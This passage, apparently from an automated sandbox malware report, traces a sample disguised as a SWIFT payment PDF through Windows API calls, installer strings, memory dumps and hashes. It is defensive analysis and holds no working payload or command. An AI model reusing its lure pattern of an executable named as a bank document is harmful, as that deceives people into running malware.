                                      • lstrcpyA.KERNEL32(007A0A88,NUL,?,00000000,?,00000000,?,00405A53,?,?,00000001,00405613,?,00000000,000000F1,?), ref: 004058AD
                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A53,?,?,00000001,00405613,?,00000000,000000F1,?), ref: 004058D1
                                      • GetShortPathNameA.KERNEL32(00000000,007A0A88,00000400), ref: 004058DA
                                        • Part of subcall function 0040578A: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                        • Part of subcall function 0040578A: lstrlenA.KERNEL32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                      • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 004058F7
                                      • wsprintfA.USER32 ref: 00405915
                                      • GetFileSize.KERNEL32(00000000,00000000,007A0E88,C0000000,00000004,007A0E88,?,?,?,?,?), ref: 00405950
                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040595F
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405979
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059A9
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,007A0688,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 004059FF
                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A11
                                      • GlobalFree.KERNEL32(00000000), ref: 00405A18
                                      • CloseHandle.KERNEL32(00000000), ref: 00405A1F
                                        • Part of subcall function 00405825: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00405829
                                        • Part of subcall function 00405825: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                      • String ID: %s=%s$NUL$[Rename]
                                      • API String ID: 3756836283-4148678300
                                      • Opcode ID: 624728a16f041d5ab8a4dfe5a1be018cc08b908fa827cbe652aff8f36f69eba2
                                      • Instruction ID: 703081f9f45e0959c07b6a00457515c8324f77790511a56e8ac0345a7c84fdf8
                                      • Opcode Fuzzy Hash: 624728a16f041d5ab8a4dfe5a1be018cc08b908fa827cbe652aff8f36f69eba2
                                      • Instruction Fuzzy Hash: 91412B71B04705AFD2206B249C49F6B7B6CEF89754F14053AFD01F62D2D678A8008EBD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule
                                      APIs
                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextA.USER32(00000000,007A1F00,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                      • Instruction ID: dd0e79dd03d73333c37d03741989dce367d08c72bd534bd23d7a1991bc4c48e1
                                      • Opcode Fuzzy Hash: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                      • Instruction Fuzzy Hash: E5419A71804249AFCB058F95CD459BFBFB9FF45310F00812AF962AA1A0C738EA51DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000236D Relevance: 15.1, APIs: 10, Instructions: 132memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 100023D2
                                      • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023EA
                                      • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023FB
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002410
                                      • GlobalFree.KERNEL32(00000000), ref: 10002417
                                        • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                      • GlobalFree.KERNEL32(?), ref: 1000248E
                                      • GlobalFree.KERNEL32(00000000), ref: 100024B7
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2278267121-0
                                      • Opcode ID: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                      • Instruction ID: 2b73d6ec50a8d2f500b210c633f34be0aa2160400c3477ecc395e3c682f4b703
                                      • Opcode Fuzzy Hash: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                      • Instruction Fuzzy Hash: DE41ADB1109216EFF715DFA4CC88E2BBBECFB042D57124619FA51921A9DB35AC409B31
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405DE2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E3A
                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E4C
                                      • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E5C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 589700163-3202841998
                                      • Opcode ID: 2024885374f02dac88d9fb103eccae40028a2ab1d30660e2dcec4d8ea4488381
                                      • Instruction ID: 982ed4f0ea0d1ffb3a75412ce8e95c0ea6245537b44222f6b90d7ae264b7a878
                                      • Opcode Fuzzy Hash: 2024885374f02dac88d9fb103eccae40028a2ab1d30660e2dcec4d8ea4488381
                                      • Instruction Fuzzy Hash: 7511B671804B9129EB3217248C44B776F98CB9A7A0F18047BE5C5723C2C67C5E828EED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403EEE Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F0B
                                      • GetSysColor.USER32(00000000), ref: 00403F27
                                      • SetTextColor.GDI32(?,00000000), ref: 00403F33
                                      • SetBkMode.GDI32(?,?), ref: 00403F3F
                                      • GetSysColor.USER32(?), ref: 00403F52
                                      • SetBkColor.GDI32(?,?), ref: 00403F62
                                      • DeleteObject.GDI32(?), ref: 00403F7C
                                      • CreateBrushIndirect.GDI32(?), ref: 00403F86
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                      • Instruction ID: 43f1f9eadd2e023582460ec461a07703dc87d5103ca70cdaf59bc9c3c4c10c95
                                      • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                      • Instruction Fuzzy Hash: B1219971904705AFC7219F68DD08B5BBFF8AF01715F04852AF995E22D1C378E944CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100021AF Relevance: 10.6, APIs: 7, Instructions: 136memorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(?), ref: 10002264
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000228E
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022A3
                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022B2
                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 100022BF
                                      • GlobalFree.KERNEL32(00000000), ref: 100022C6
                                      • GlobalFree.KERNEL32(00000000), ref: 100022FD
                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                      • String ID:
                                      • API String ID: 3955009414-0
                                      • Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                      • Instruction ID: a605aeec0f08bdd00b0ee3428b37a4786007c3c680f5ed26bc2609ce7b065058
                                      • Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                      • Instruction Fuzzy Hash: 5741AD70504306EFF364DFA48984B6BB7F8FB453E1F21492AF956C619ADB30A840DB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040268D Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
                                      • GlobalFree.KERNEL32(?), ref: 00402736
                                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
                                      • GlobalFree.KERNEL32(00000000), ref: 0040274F
                                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                      • String ID:
                                      • API String ID: 3294113728-0
                                      • Opcode ID: 2edcbcb0ce5bc09c9fed5e436934c6b2b427d54b956c9de44b59f354a0a616e3
                                      • Instruction ID: 94283e328d35fee59e2da4f8035aa06736476ebf885dd15e4876c46effbb42d0
                                      • Opcode Fuzzy Hash: 2edcbcb0ce5bc09c9fed5e436934c6b2b427d54b956c9de44b59f354a0a616e3
                                      • Instruction Fuzzy Hash: E4319171C00128BBCF216FA5DD89DAE7E79EF05364F20423AF520762E1C7791D408BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040474F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476A
                                      • GetMessagePos.USER32 ref: 00404772
                                      • ScreenToClient.USER32(?,?), ref: 0040478C
                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040479E
                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                      • Instruction ID: 6bd71cb3d479751b3b69d93d67c88433f783f46e4abb255f82c81c082e4bdd88
                                      • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                      • Instruction Fuzzy Hash: C5014075D00218BADB01DBA4DC45FFEBBBCAB55711F10412BBB10B71C0C7B865018BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402B4C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                      • MulDiv.KERNEL32(00066488,00000064,00066ED8), ref: 00402B92
                                      • wsprintfA.USER32 ref: 00402BA2
                                      • SetWindowTextA.USER32(?,?), ref: 00402BB2
                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BC4
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402B9C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                      • Instruction ID: 338c4dd4cc7a1f9a3f94f7e8e9aba01fa07f8a2d27e46d6da828e47d9d426f75
                                      • Opcode Fuzzy Hash: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                      • Instruction Fuzzy Hash: 32014F70540208ABEF249F61DD0AEAE37B9AB00304F00803AFA06A92D1D7B9A9518B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(?), ref: 00401D29
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                      • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                      • CreateFontIndirectA.GDI32(0040AFA0), ref: 00401DA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID: Tahoma
                                      • API String ID: 3808545654-3580928618
                                      • Opcode ID: 4b6deaec8962dedea7c43a262c6b0a52d1d618742be22b81ec12100f8d4d3c7f
                                      • Instruction ID: 4f22f7d967d41569425e1cc72a43e48c322de2a0bc5ea7779ffcdbaac11077e3
                                      • Opcode Fuzzy Hash: 4b6deaec8962dedea7c43a262c6b0a52d1d618742be22b81ec12100f8d4d3c7f
                                      • Instruction Fuzzy Hash: 760162B1958341AFE7015BB0AE1ABAF7F74A725705F100439F145BA2E2C67C14158B2B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040466D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(Epicurize Setup: Installing,Epicurize Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040458D,000000DF,0000040F,00000400,00000000), ref: 004046FB
                                      • wsprintfA.USER32 ref: 00404703
                                      • SetDlgItemTextA.USER32(?,Epicurize Setup: Installing), ref: 00404716
                                      Strings
                                      Memory Dump Source
